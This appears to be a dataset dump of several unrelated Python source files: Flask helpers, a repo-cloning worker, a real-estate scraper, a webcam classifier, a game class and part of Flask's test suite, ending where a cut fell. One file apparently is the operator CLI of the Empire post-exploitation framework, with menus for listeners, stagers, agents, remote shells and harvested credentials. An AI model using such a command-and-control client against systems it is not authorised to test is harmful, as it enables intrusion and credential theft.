source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
web.py
|
from flask import Flask
from threading import Thread
app = Flask('WEB')
@app.route('/')
def home():
return "I am Discord Bot and I'm vibing to Inception"
def run():
app.run(host='0.0.0.0', port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
|
cloner.py
|
import os
import sys
import time
import signal
import multiprocessing
PROJECT_PATH = os.path.abspath(os.path.dirname(__file__))
sys.path.append(os.path.join(PROJECT_PATH, '..', '..'))
from pygithub3 import Github
import src.todoMelvin
from src.todoMelvin import settings, createGithubObject
from src.todoLogging import WarningLevels, log
from src.db.todoRepos import RepoQueues, Repo
from src.workers.workerStatus import WorkerStatus
redis = src.db.todoRedis.connect()
def runWorker(status):
#This causes this thread to ignore interrupt signals so theya re only handled by parent
signal.signal(signal.SIGINT, signal.SIG_IGN)
#Loop will be closed externally
while status.value != WorkerStatus.Dead:
try:
cloneCount = redis.llen(RepoQueues.Cloning)
parseCount = redis.llen(RepoQueues.Parsing)
except:
log(WarningLevels.Fatal, "Cloning Worker unable to reach Redis")
break
if cloneCount > 0 and parseCount < int(settings.maxParseQueueCount):
repoKey = redis.lpop(RepoQueues.Cloning)
repo = Repo()
repo.loadFromKey(repoKey)
#sanity check our loaded key
assert repo.key() == repoKey, "Bad repo saved in cloning Queue! Key %s not found!"%(repoKey)
#clone the repo and add it to the parse queue
src.todoMelvin.checkoutRepo(repo)
redis.rpush(RepoQueues.Parsing, repoKey)
else:
sleepTime = float(settings.clonerSleepTime)
log(WarningLevels.Debug, "Cloning Worker going to sleep...")
#Set to sleeping for faster shutdown
status.value = WorkerStatus.Sleeping
time.sleep(sleepTime)
status.value = WorkerStatus.Working
def main(argv):
src.todoLogging.logSender = "CLO%s"%(argv)
log(WarningLevels.Info, "Starting Cloning Worker.")
#async global status value that is shared with processes
status = multiprocessing.Value('i', WorkerStatus.Working)
try:
#Start the function and wait for it to end
process = multiprocessing.Process(target = runWorker, args = (status, ))
process.start()
process.join()
except KeyboardInterrupt, SystemExit:
if status.value == WorkerStatus.Sleeping:
log(WarningLevels.Info, "Shutdown signal received while asleep. Cloning worker shutting down.")
process.terminate()
process.join()
else:
log(WarningLevels.Info, "Shutdown signal received. Allow Cloner to finish current operation.")
status.value = WorkerStatus.Dead
process.join()
log(WarningLevels.Info, "Cloning Worker has shut down.")
if __name__ == "__main__":
if len(sys.argv) > 1:
main(sys.argv[1])
else:
main("0")
|
pa_lianjia_new.py
|
import json
import threading
from selenium import webdriver
def task(url):
driver = webdriver.PhantomJS(executable_path=r'D:\phantomjs-2.1.1-windows\bin\phantomjs.exe')
driver.get(url)
loupan_list = driver.find_elements_by_xpath('//ul[@class="resblock-list-wrapper"]/li')
for loupan in loupan_list:
loupan_info = {}
loupan_name = loupan.find_element_by_xpath('.//a[@class="name "]').text.strip()
loupan_img_url = loupan.find_element_by_class_name('lj-lazy').get_attribute('data-original')
loupan_type = loupan.find_element_by_xpath('.//span[@class="resblock-type"]').text.strip()
loupan_location = loupan.find_element_by_xpath('.//div[@class="resblock-location"]/span[1]').text.strip()
loupan_area = loupan.find_element_by_xpath('.//div[@class="resblock-area"]/span').text.strip()
loupan_avg_price = loupan.find_element_by_xpath('.//div[@class="main-price"]/span[1]').text.strip() + \
loupan.find_element_by_xpath('.//div[@class="main-price"]/span[2]').text.strip()
# loupan_total_price = loupan.find_element_by_xpath('.//div[@class="resblock-price"]/div[@class="second"]').text.strip()
loupan_info["楼盘名称"] = loupan_name
loupan_info["楼盘图片链接"] = loupan_img_url
loupan_info["类型"] = loupan_type
loupan_info["所在区域"] = loupan_location
loupan_info["户型建筑面积"] = loupan_area
loupan_info["均价"] = loupan_avg_price
data.append(loupan_info)
print('{} load over.'.format(loupan_name))
def main():
threading_list = []
for i in range(1, 3):
url = 'https://bj.fang.lianjia.com/loupan/pg{}/'.format(i)
t = threading.Thread(target=task, args=(url,))
threading_list.append(t)
t.start()
for t in threading_list:
t.join()
with open('lianjia.txt', mode='w', encoding='utf-8') as fp:
json.dump(data, fp, ensure_ascii=False)
if __name__ == '__main__':
data = []
main()
|
main.py
|
import re
import shlex
import threading
import time
from typing import get_type_hints, Dict, List, Optional
import urllib3
from docopt import docopt
from prompt_toolkit import PromptSession, HTML
from prompt_toolkit.completion import Completer
from prompt_toolkit.history import InMemoryHistory
from prompt_toolkit.patch_stdout import patch_stdout
from src.EmpireCliConfig import empire_config
from src.EmpireCliState import state
from src.MenuState import menu_state
from src.ShortcutHandler import shortcut_handler
from src.bindings import bindings
from src.menus import Menu
from src.menus.AdminMenu import admin_menu
from src.menus.AgentMenu import agent_menu
from src.menus.ChatMenu import chat_menu
from src.menus.CredentialMenu import credential_menu
from src.menus.InteractMenu import interact_menu
from src.menus.ListenerMenu import listener_menu
from src.menus.MainMenu import main_menu
from src.menus.PluginMenu import plugin_menu
from src.menus.ShellMenu import shell_menu
from src.menus.UseListenerMenu import use_listener_menu
from src.menus.UseModuleMenu import use_module_menu
from src.menus.UsePluginMenu import use_plugin_menu
from src.menus.UseStagerMenu import use_stager_menu
from src.utils import print_util
class MyCustomCompleter(Completer):
def __init__(self, empire_cli):
self.empire_cli = empire_cli
def get_completions(self, document, complete_event):
word_before_cursor = document.get_word_before_cursor(WORD=True)
try:
cmd_line = list(map(lambda s: s.lower(), shlex.split(document.current_line)))
if len(cmd_line) == 0:
cmd_line.append('')
except ValueError:
pass
else:
if not state.connected:
yield from self.empire_cli.menus['MainMenu'].get_completions(document, complete_event, cmd_line,
word_before_cursor)
# These commands should be accessible anywhere.
elif cmd_line[0] in ['uselistener']:
yield from self.empire_cli.menus['UseListenerMenu'].get_completions(document, complete_event, cmd_line,
word_before_cursor)
elif cmd_line[0] in ['usestager']:
yield from self.empire_cli.menus['UseStagerMenu'].get_completions(document, complete_event, cmd_line,
word_before_cursor)
elif cmd_line[0] in ['usemodule']:
yield from self.empire_cli.menus['UseModuleMenu'].get_completions(document, complete_event, cmd_line,
word_before_cursor)
elif cmd_line[0] in ['interact']:
yield from self.empire_cli.menus['InteractMenu'].get_completions(document, complete_event, cmd_line,
word_before_cursor)
elif cmd_line[0] in ['useplugin']:
yield from self.empire_cli.menus['UsePluginMenu'].get_completions(document, complete_event, cmd_line,
word_before_cursor)
else:
# Menu specific commands
yield from menu_state.current_menu.get_completions(document, complete_event, cmd_line,
word_before_cursor)
class CliExitException(BaseException):
pass
class EmpireCli(object):
def __init__(self) -> None:
self.completer = MyCustomCompleter(self)
self.menus: Dict[Menu] = {
'MainMenu': main_menu,
'ListenerMenu': listener_menu,
'UseListenerMenu': use_listener_menu,
'UseStagerMenu': use_stager_menu,
'AgentMenu': agent_menu,
'UseModuleMenu': use_module_menu,
'InteractMenu': interact_menu,
'ShellMenu': shell_menu,
'CredentialMenu': credential_menu,
'PluginMenu': plugin_menu,
'UsePluginMenu': use_plugin_menu,
'AdminMenu': admin_menu,
'ChatMenu': chat_menu
}
for menu in self.menus.values():
state.register_menu(menu)
@staticmethod
def bottom_toolbar():
if state.connected:
return HTML(f'Connected to {state.host}:{state.port}. {len(state.agents)} agents. {len(chat_menu.chat_cache)} unread messages.')
else:
return ''
@staticmethod
def strip(options):
return {re.sub('[^A-Za-z0-9 _]+', '', k): v for k, v in options.items()}
@staticmethod
def get_autoconnect_server() -> Optional[str]:
"""
Looks for a server in the yaml marked for autoconnect.
If one is not found, returns None
:return: the name of the server to autoconnect
"""
servers = empire_config.yaml.get('servers', {})
autoserver = list(filter(lambda x: x[1].get('autoconnect') is True, servers.items()))
if len(autoserver) > 0:
return autoserver[0][0]
return None
@staticmethod
def update_in_bg(session: PromptSession):
while True:
time.sleep(2)
session.message = HTML(menu_state.current_menu.get_prompt())
session.app.invalidate()
def main(self):
if empire_config.yaml.get('suppress-self-cert-warning', True):
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Create some history first. (Easy for testing.)
history = InMemoryHistory()
history.append_string("help")
history.append_string('uselistener http')
history.append_string('listeners')
history.append_string("main")
history.append_string("connect -c localhost")
print_util.loading()
print("\n")
print("Use the 'connect' command to connect to your Empire server.")
print("'connect -c localhost' will connect to a local empire instance with all the defaults")
print("including the default username and password.")
session = PromptSession(
key_bindings=bindings,
history=history,
# auto_suggest=AutoSuggestFromHistory(),
# enable_history_search=True,
completer=self.completer,
complete_in_thread=True,
# complete_while_typing=True,
bottom_toolbar=self.bottom_toolbar,
# swap_light_and_dark_colors=True,
# mouse_support=True
)
t = threading.Thread(target=self.update_in_bg, args=[session])
t.daemon = True
t.start()
autoserver = self.get_autoconnect_server()
if autoserver:
print(print_util.color(f'[*] Attempting to connect to server: {autoserver}'))
self.menus['MainMenu'].connect(autoserver, config=True)
if empire_config.yaml.get('resource-file'):
with open(empire_config.yaml.get('resource-file')) as resource_file:
print(print_util.color(f"[*] Executing Resource File: {empire_config.yaml.get('resource-file')}"))
for cmd in resource_file:
with patch_stdout():
try:
time.sleep(1)
text = session.prompt(accept_default=True, default=cmd.strip())
cmd_line = list(shlex.split(text))
self.parse_command_line(text, cmd_line)
except Exception as e:
print(print_util.color(f'[*] Error parsing resource command: ', text))
while True:
try:
with patch_stdout():
text = session.prompt(HTML(menu_state.current_menu.get_prompt()), refresh_interval=None)
# cmd_line = list(map(lambda s: s.lower(), shlex.split(text)))
# TODO what to do about case sensitivity for parsing options.
cmd_line = list(shlex.split(text))
self.parse_command_line(text, cmd_line)
except KeyboardInterrupt:
print(print_util.color("[!] Type exit to quit"))
except EOFError:
break # Control-D pressed.
except CliExitException:
break
def parse_command_line(self, text: str, cmd_line: List[str]):
if len(cmd_line) == 0:
return
if not state.connected and not cmd_line[0] == 'connect':
if cmd_line[0] == 'exit':
choice = input(print_util.color("[>] Exit? [y/N] ", "red"))
if choice.lower() == "y":
raise CliExitException
else:
return
else:
return
# Switch Menus
if text == 'main':
print_util.title(state.empire_version, len(state.modules), len(state.listeners), len(state.agents))
menu_state.push(self.menus['MainMenu'])
elif text == 'listeners':
menu_state.push(self.menus['ListenerMenu'])
elif text == 'chat':
menu_state.push(self.menus['ChatMenu'])
elif menu_state.current_menu_name == 'ChatMenu':
menu_state.current_menu.send_chat(text)
elif text == 'agents':
menu_state.push(self.menus['AgentMenu'])
elif text == 'credentials':
menu_state.push(self.menus['CredentialMenu'])
elif text == 'plugins':
menu_state.push(self.menus['PluginMenu'])
elif text == 'admin':
menu_state.push(self.menus['AdminMenu'])
elif cmd_line[0] == 'uselistener' and len(cmd_line) > 1:
if cmd_line[1] in state.listener_types:
menu_state.push(self.menus['UseListenerMenu'], selected=cmd_line[1])
else:
print(f'No listener {cmd_line[1]}')
elif cmd_line[0] == 'usestager' and len(cmd_line) > 1:
if cmd_line[1] in state.stagers:
menu_state.push(self.menus['UseStagerMenu'], selected=cmd_line[1])
else:
print(f'No stager {cmd_line[1]}')
elif cmd_line[0] == 'interact' and len(cmd_line) > 1:
if cmd_line[1] in state.agents:
menu_state.push(self.menus['InteractMenu'], selected=cmd_line[1])
else:
print(f'No agent {cmd_line[1]}')
elif cmd_line[0] == 'useplugin' and len(cmd_line) > 1:
if cmd_line[1] in state.plugins:
menu_state.push(self.menus['UsePluginMenu'], selected=cmd_line[1])
else:
print(f'No plugin {cmd_line[1]}')
elif cmd_line[0] == 'usemodule' and len(cmd_line) > 1:
if cmd_line[1] in state.modules:
if menu_state.current_menu_name == 'InteractMenu':
menu_state.push(self.menus['UseModuleMenu'], selected=cmd_line[1],
agent=menu_state.current_menu.selected)
else:
menu_state.push(self.menus['UseModuleMenu'], selected=cmd_line[1])
else:
print(f'No module {cmd_line[1]}')
elif text == 'shell':
if menu_state.current_menu_name == 'InteractMenu':
menu_state.push(self.menus['ShellMenu'], selected=menu_state.current_menu.selected)
else:
pass
elif menu_state.current_menu_name == 'ShellMenu':
if text == 'exit':
menu_state.push(self.menus['InteractMenu'], selected=menu_state.current_menu.selected)
else:
menu_state.current_menu.shell(menu_state.current_menu.selected, text)
elif cmd_line[0] == 'report':
if len(cmd_line) > 1:
state.generate_report(cmd_line[1])
else:
state.generate_report('')
elif text == 'back':
menu_state.pop()
elif text == 'exit':
choice = input(print_util.color("[>] Exit? [y/N] ", "red"))
if choice.lower() == "y":
raise CliExitException
else:
pass
else:
func = None
try:
func = getattr(menu_state.current_menu if hasattr(menu_state.current_menu, cmd_line[0]) else self, cmd_line[0])
except:
pass
if func:
try:
args = self.strip(docopt(
func.__doc__,
argv=cmd_line[1:]
))
new_args = {}
# todo casting for type hinted values?
for key, hint in get_type_hints(func).items():
# if args.get(key) is not None:
if key != 'return':
new_args[key] = args[key]
# print(new_args)
func(**new_args)
except Exception as e:
print(e)
pass
except SystemExit as e:
pass
elif not func and menu_state.current_menu_name == 'InteractMenu':
if cmd_line[0] in shortcut_handler.get_names(self.menus['InteractMenu'].agent_language):
menu_state.current_menu.execute_shortcut(cmd_line[0], cmd_line[1:])
if __name__ == "__main__":
try:
empire = EmpireCli()
empire.main()
finally:
state.shutdown()
|
http_server.py
|
import os
import socketserver
import time
import traceback
from http.server import BaseHTTPRequestHandler
from pathlib import Path
from socket import socket, AF_INET, SOCK_DGRAM
from threading import Thread, Timer
def serve_file(filename, content_type=None):
"""
Create an http server on a random port to serve a file.
The file can be downloaded only one time. After 1 minutes the server is stoped
filename: string The file path or file content
content_type: the file content-type
"""
class FileHandler(BaseHTTPRequestHandler):
def do_GET(self): # noqa
try:
self.send_response(200)
self.send_header("Content-type", content_type)
self.send_header("Access-Control-Allow-Origin", "*")
self.end_headers()
if os.path.exists(str(filename)):
mediapath = Path(filename)
length = mediapath.stat().st_size
mtime = mediapath.stat().st_mtime
self.send_header("Content-Length", length)
self.send_header("Last-Modified", time.strftime("%a %d %b %Y %H:%M:%S GMT", time.localtime(mtime)))
with open(str(mediapath), "rb") as mediafile:
while True:
data = mediafile.read(100 * 1024)
if not data:
break
self.wfile.write(data)
else:
self.send_header("Content-Length", len(filename))
self.send_header("Last-Modified", time.strftime("%a %d %b %Y %H:%M:%S GMT", time.localtime()))
self.wfile.write(filename)
except: # noqa
traceback.print_exc()
tthToStopServer.cancel()
stopServer(httpd)
def startServer(httpd):
httpd.serve_forever()
httpd.server_close()
def stopServer(httpd):
Thread(target=httpd.shutdown).start()
if content_type is None:
content_type = "video/mp4"
httpd = socketserver.TCPServer(("0.0.0.0", 0), FileHandler)
Thread(target=startServer, args=[httpd]).start()
tthToStopServer = Timer(60.0, stopServer, args=[httpd])
tthToStopServer.start()
s = socket(AF_INET, SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
local_ip = s.getsockname()[0]
s.close()
(host, port) = httpd.server_address
return "http://" + local_ip + ":" + str(port)
|
detector.py
|
from threading import Thread
import collections
import tensorflow as tf
import numpy as np
import cv2
class Detector:
def __init__(self, model_path, label_path):
self.running = True
self.camera = cv2.VideoCapture(0)
self.results = collections.deque(maxlen=10)
self.interpreter = tf.lite.Interpreter(model_path=model_path)
self.interpreter.allocate_tensors()
self.input_details = self.interpreter.get_input_details()
self.output_details = self.interpreter.get_output_details()
self.target_height = self.input_details[0]['shape'][1]
self.target_width = self.input_details[0]['shape'][2]
self.classes = {}
with open(label_path, 'r') as f:
for line in f.readlines():
pair = line.strip().split(maxsplit=1)
self.classes[int(pair[0])] = pair[1].strip()
def start(self):
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
def update(self):
while self.running:
ret, frame = self.camera.read()
if not ret:
continue
frame = cv2.flip(frame, 1)
input_data = self.preprocess_image(frame)
detection = self.predict(input_data)
frame = self.draw_detection(frame, detection)
self.results.append(np.argmax(detection[0]))
cv2.imshow('frame', frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
self.camera.release()
cv2.destroyAllWindows()
def stop(self):
self.running = False
def preprocess_image(self, frame):
resized = cv2.resize(frame, (self.target_width, self.target_height))
rgb = cv2.cvtColor(resized, cv2.COLOR_BGR2RGB)
normalized = (np.float32(rgb) - 127.5) / 127.5
input_data = np.expand_dims(normalized, axis=0)
return input_data
def predict(self, input_data):
self.interpreter.set_tensor(self.input_details[0]['index'],
input_data)
self.interpreter.invoke()
detection = self.interpreter.get_tensor(self.output_details[0]['index'])
return detection
def draw_detection(self, frame, detection):
for i, s in enumerate(detection[0]):
tag = f'{self.classes[i]}: {s*100:.2f}%'
cv2.putText(frame, tag, (10, 20 + 20 * i),
cv2.FONT_HERSHEY_SIMPLEX,
0.7, (0, 255, 0), 1)
return frame
def get_result(self):
if len(self.results) == 0:
return 0
counter = collections.Counter(self.results)
result = counter.most_common()[0][0]
return result
if __name__ == '__main__':
import time
d = Detector('model_unquant.tflite', 'labels.txt')
d.start()
for i in range(20):
print(i, d.get_result())
time.sleep(1)
d.stop()
|
arbusto.py
|
'''
Created on 28 de abr de 2020
@author: leonardo
Content: Classe Arbusto
'''
from componentes.jogo.objetos_estaticos import ObjetosEstaticos
import random
from componentes.jogo.distancia_bomba import DistanciaBomba
from componentes.jogo.multi_bomba import MultiBomba
from componentes.jogo.raio_bomba import RaioBomba
from componentes.jogo.velocidade import Velocidade
import time
from threading import Thread
class Arbusto(ObjetosEstaticos):
def destruir(self, personagem):
#Seleciona um poder
objeto = self.is_power()
if (objeto != None):
print("Aplica o poder")
objeto.poder(personagem)
#Apaga o objeto que foi usado para fazer o poder
del objeto
personagem.servidor.remove(self.oid)
respawn = Thread(target= self.re_spawn, args=(personagem,))
respawn.start()
#Estas dudas funções podem virar uma só, mas precisamos passar o id para onde o poder vai...
def is_power(self):
r = random.randint(0,5)
#Switch implementado com dicionário
switcher = {
0: Velocidade(),
1: RaioBomba(),
2: DistanciaBomba(),
3: MultiBomba()
}
#Escolher qual construtor será usado
if (r <= 3):
objeto = switcher.get(r, lambda: None)
return objeto
else:
return None
def re_spawn(self, personagem):
time.sleep(15)
personagem.servidor.respawn(self)
|
test_basic.py
|
# -*- coding: utf-8 -*-
"""
tests.basic
~~~~~~~~~~~~~~~~~~~~~
The basic functionality.
:copyright: © 2010 by the Pallets team.
:license: BSD, see LICENSE for more details.
"""
import re
import sys
import time
import uuid
from datetime import datetime
from threading import Thread
import pytest
import werkzeug.serving
from werkzeug.exceptions import BadRequest, Forbidden, NotFound
from werkzeug.http import parse_date
from werkzeug.routing import BuildError
import flask
from flask._compat import text_type
def test_options_work(app, client):
@app.route("/", methods=["GET", "POST"])
def index():
return "Hello World"
rv = client.open("/", method="OPTIONS")
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST"]
assert rv.data == b""
def test_options_on_multiple_rules(app, client):
@app.route("/", methods=["GET", "POST"])
def index():
return "Hello World"
@app.route("/", methods=["PUT"])
def index_put():
return "Aha!"
rv = client.open("/", method="OPTIONS")
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST", "PUT"]
def test_provide_automatic_options_attr():
app = flask.Flask(__name__)
def index():
return "Hello World!"
index.provide_automatic_options = False
app.route("/")(index)
rv = app.test_client().open("/", method="OPTIONS")
assert rv.status_code == 405
app = flask.Flask(__name__)
def index2():
return "Hello World!"
index2.provide_automatic_options = True
app.route("/", methods=["OPTIONS"])(index2)
rv = app.test_client().open("/", method="OPTIONS")
assert sorted(rv.allow) == ["OPTIONS"]
def test_provide_automatic_options_kwarg(app, client):
def index():
return flask.request.method
def more():
return flask.request.method
app.add_url_rule("/", view_func=index, provide_automatic_options=False)
app.add_url_rule(
"/more",
view_func=more,
methods=["GET", "POST"],
provide_automatic_options=False,
)
assert client.get("/").data == b"GET"
rv = client.post("/")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD"]
# Older versions of Werkzeug.test.Client don't have an options method
if hasattr(client, "options"):
rv = client.options("/")
else:
rv = client.open("/", method="OPTIONS")
assert rv.status_code == 405
rv = client.head("/")
assert rv.status_code == 200
assert not rv.data # head truncates
assert client.post("/more").data == b"POST"
assert client.get("/more").data == b"GET"
rv = client.delete("/more")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "POST"]
if hasattr(client, "options"):
rv = client.options("/more")
else:
rv = client.open("/more", method="OPTIONS")
assert rv.status_code == 405
def test_request_dispatching(app, client):
@app.route("/")
def index():
return flask.request.method
@app.route("/more", methods=["GET", "POST"])
def more():
return flask.request.method
assert client.get("/").data == b"GET"
rv = client.post("/")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS"]
rv = client.head("/")
assert rv.status_code == 200
assert not rv.data # head truncates
assert client.post("/more").data == b"POST"
assert client.get("/more").data == b"GET"
rv = client.delete("/more")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST"]
def test_disallow_string_for_allowed_methods(app):
with pytest.raises(TypeError):
@app.route("/", methods="GET POST")
def index():
return "Hey"
def test_url_mapping(app, client):
random_uuid4 = "7eb41166-9ebf-4d26-b771-ea3f54f8b383"
def index():
return flask.request.method
def more():
return flask.request.method
def options():
return random_uuid4
app.add_url_rule("/", "index", index)
app.add_url_rule("/more", "more", more, methods=["GET", "POST"])
# Issue 1288: Test that automatic options are not added when non-uppercase 'options' in methods
app.add_url_rule("/options", "options", options, methods=["options"])
assert client.get("/").data == b"GET"
rv = client.post("/")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS"]
rv = client.head("/")
assert rv.status_code == 200
assert not rv.data # head truncates
assert client.post("/more").data == b"POST"
assert client.get("/more").data == b"GET"
rv = client.delete("/more")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST"]
rv = client.open("/options", method="OPTIONS")
assert rv.status_code == 200
assert random_uuid4 in rv.data.decode("utf-8")
def test_werkzeug_routing(app, client):
from werkzeug.routing import Submount, Rule
app.url_map.add(
Submount("/foo", [Rule("/bar", endpoint="bar"), Rule("/", endpoint="index")])
)
def bar():
return "bar"
def index():
return "index"
app.view_functions["bar"] = bar
app.view_functions["index"] = index
assert client.get("/foo/").data == b"index"
assert client.get("/foo/bar").data == b"bar"
def test_endpoint_decorator(app, client):
from werkzeug.routing import Submount, Rule
app.url_map.add(
Submount("/foo", [Rule("/bar", endpoint="bar"), Rule("/", endpoint="index")])
)
@app.endpoint("bar")
def bar():
return "bar"
@app.endpoint("index")
def index():
return "index"
assert client.get("/foo/").data == b"index"
assert client.get("/foo/bar").data == b"bar"
def test_session(app, client):
@app.route("/set", methods=["POST"])
def set():
assert not flask.session.accessed
assert not flask.session.modified
flask.session["value"] = flask.request.form["value"]
assert flask.session.accessed
assert flask.session.modified
return "value set"
@app.route("/get")
def get():
assert not flask.session.accessed
assert not flask.session.modified
v = flask.session.get("value", "None")
assert flask.session.accessed
assert not flask.session.modified
return v
assert client.post("/set", data={"value": "42"}).data == b"value set"
assert client.get("/get").data == b"42"
def test_session_using_server_name(app, client):
app.config.update(SERVER_NAME="example.com")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com/")
assert "domain=.example.com" in rv.headers["set-cookie"].lower()
assert "httponly" in rv.headers["set-cookie"].lower()
def test_session_using_server_name_and_port(app, client):
app.config.update(SERVER_NAME="example.com:8080")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com:8080/")
assert "domain=.example.com" in rv.headers["set-cookie"].lower()
assert "httponly" in rv.headers["set-cookie"].lower()
def test_session_using_server_name_port_and_path(app, client):
app.config.update(SERVER_NAME="example.com:8080", APPLICATION_ROOT="/foo")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com:8080/foo")
assert "domain=example.com" in rv.headers["set-cookie"].lower()
assert "path=/foo" in rv.headers["set-cookie"].lower()
assert "httponly" in rv.headers["set-cookie"].lower()
def test_session_using_application_root(app, client):
class PrefixPathMiddleware(object):
def __init__(self, app, prefix):
self.app = app
self.prefix = prefix
def __call__(self, environ, start_response):
environ["SCRIPT_NAME"] = self.prefix
return self.app(environ, start_response)
app.wsgi_app = PrefixPathMiddleware(app.wsgi_app, "/bar")
app.config.update(APPLICATION_ROOT="/bar")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com:8080/")
assert "path=/bar" in rv.headers["set-cookie"].lower()
def test_session_using_session_settings(app, client):
app.config.update(
SERVER_NAME="www.example.com:8080",
APPLICATION_ROOT="/test",
SESSION_COOKIE_DOMAIN=".example.com",
SESSION_COOKIE_HTTPONLY=False,
SESSION_COOKIE_SECURE=True,
SESSION_COOKIE_SAMESITE="Lax",
SESSION_COOKIE_PATH="/",
)
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://www.example.com:8080/test/")
cookie = rv.headers["set-cookie"].lower()
assert "domain=.example.com" in cookie
assert "path=/" in cookie
assert "secure" in cookie
assert "httponly" not in cookie
assert "samesite" in cookie
def test_session_using_samesite_attribute(app, client):
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
app.config.update(SESSION_COOKIE_SAMESITE="invalid")
with pytest.raises(ValueError):
client.get("/")
app.config.update(SESSION_COOKIE_SAMESITE=None)
rv = client.get("/")
cookie = rv.headers["set-cookie"].lower()
assert "samesite" not in cookie
app.config.update(SESSION_COOKIE_SAMESITE="Strict")
rv = client.get("/")
cookie = rv.headers["set-cookie"].lower()
assert "samesite=strict" in cookie
app.config.update(SESSION_COOKIE_SAMESITE="Lax")
rv = client.get("/")
cookie = rv.headers["set-cookie"].lower()
assert "samesite=lax" in cookie
def test_session_localhost_warning(recwarn, app, client):
app.config.update(SERVER_NAME="localhost:5000")
@app.route("/")
def index():
flask.session["testing"] = 42
return "testing"
rv = client.get("/", "http://localhost:5000/")
assert "domain" not in rv.headers["set-cookie"].lower()
w = recwarn.pop(UserWarning)
assert '"localhost" is not a valid cookie domain' in str(w.message)
def test_session_ip_warning(recwarn, app, client):
app.config.update(SERVER_NAME="127.0.0.1:5000")
@app.route("/")
def index():
flask.session["testing"] = 42
return "testing"
rv = client.get("/", "http://127.0.0.1:5000/")
assert "domain=127.0.0.1" in rv.headers["set-cookie"].lower()
w = recwarn.pop(UserWarning)
assert "cookie domain is an IP" in str(w.message)
def test_missing_session(app):
app.secret_key = None
def expect_exception(f, *args, **kwargs):
e = pytest.raises(RuntimeError, f, *args, **kwargs)
assert e.value.args and "session is unavailable" in e.value.args[0]
with app.test_request_context():
assert flask.session.get("missing_key") is None
expect_exception(flask.session.__setitem__, "foo", 42)
expect_exception(flask.session.pop, "foo")
def test_session_expiration(app, client):
permanent = True
@app.route("/")
def index():
flask.session["test"] = 42
flask.session.permanent = permanent
return ""
@app.route("/test")
def test():
return text_type(flask.session.permanent)
rv = client.get("/")
assert "set-cookie" in rv.headers
match = re.search(r"(?i)\bexpires=([^;]+)", rv.headers["set-cookie"])
expires = parse_date(match.group())
expected = datetime.utcnow() + app.permanent_session_lifetime
assert expires.year == expected.year
assert expires.month == expected.month
assert expires.day == expected.day
rv = client.get("/test")
assert rv.data == b"True"
permanent = False
rv = client.get("/")
assert "set-cookie" in rv.headers
match = re.search(r"\bexpires=([^;]+)", rv.headers["set-cookie"])
assert match is None
def test_session_stored_last(app, client):
@app.after_request
def modify_session(response):
flask.session["foo"] = 42
return response
@app.route("/")
def dump_session_contents():
return repr(flask.session.get("foo"))
assert client.get("/").data == b"None"
assert client.get("/").data == b"42"
def test_session_special_types(app, client):
now = datetime.utcnow().replace(microsecond=0)
the_uuid = uuid.uuid4()
@app.route("/")
def dump_session_contents():
flask.session["t"] = (1, 2, 3)
flask.session["b"] = b"\xff"
flask.session["m"] = flask.Markup("<html>")
flask.session["u"] = the_uuid
flask.session["d"] = now
flask.session["t_tag"] = {" t": "not-a-tuple"}
flask.session["di_t_tag"] = {" t__": "not-a-tuple"}
flask.session["di_tag"] = {" di": "not-a-dict"}
return "", 204
with client:
client.get("/")
s = flask.session
assert s["t"] == (1, 2, 3)
assert type(s["b"]) == bytes
assert s["b"] == b"\xff"
assert type(s["m"]) == flask.Markup
assert s["m"] == flask.Markup("<html>")
assert s["u"] == the_uuid
assert s["d"] == now
assert s["t_tag"] == {" t": "not-a-tuple"}
assert s["di_t_tag"] == {" t__": "not-a-tuple"}
assert s["di_tag"] == {" di": "not-a-dict"}
def test_session_cookie_setting(app):
is_permanent = True
@app.route("/bump")
def bump():
rv = flask.session["foo"] = flask.session.get("foo", 0) + 1
flask.session.permanent = is_permanent
return str(rv)
@app.route("/read")
def read():
return str(flask.session.get("foo", 0))
def run_test(expect_header):
with app.test_client() as c:
assert c.get("/bump").data == b"1"
assert c.get("/bump").data == b"2"
assert c.get("/bump").data == b"3"
rv = c.get("/read")
set_cookie = rv.headers.get("set-cookie")
assert (set_cookie is not None) == expect_header
assert rv.data == b"3"
is_permanent = True
app.config["SESSION_REFRESH_EACH_REQUEST"] = True
run_test(expect_header=True)
is_permanent = True
app.config["SESSION_REFRESH_EACH_REQUEST"] = False
run_test(expect_header=False)
is_permanent = False
app.config["SESSION_REFRESH_EACH_REQUEST"] = True
run_test(expect_header=False)
is_permanent = False
app.config["SESSION_REFRESH_EACH_REQUEST"] = False
run_test(expect_header=False)
def test_session_vary_cookie(app, client):
@app.route("/set")
def set_session():
flask.session["test"] = "test"
return ""
@app.route("/get")
def get():
return flask.session.get("test")
@app.route("/getitem")
def getitem():
return flask.session["test"]
@app.route("/setdefault")
def setdefault():
return flask.session.setdefault("test", "default")
@app.route("/vary-cookie-header-set")
def vary_cookie_header_set():
response = flask.Response()
response.vary.add("Cookie")
flask.session["test"] = "test"
return response
@app.route("/vary-header-set")
def vary_header_set():
response = flask.Response()
response.vary.update(("Accept-Encoding", "Accept-Language"))
flask.session["test"] = "test"
return response
@app.route("/no-vary-header")
def no_vary_header():
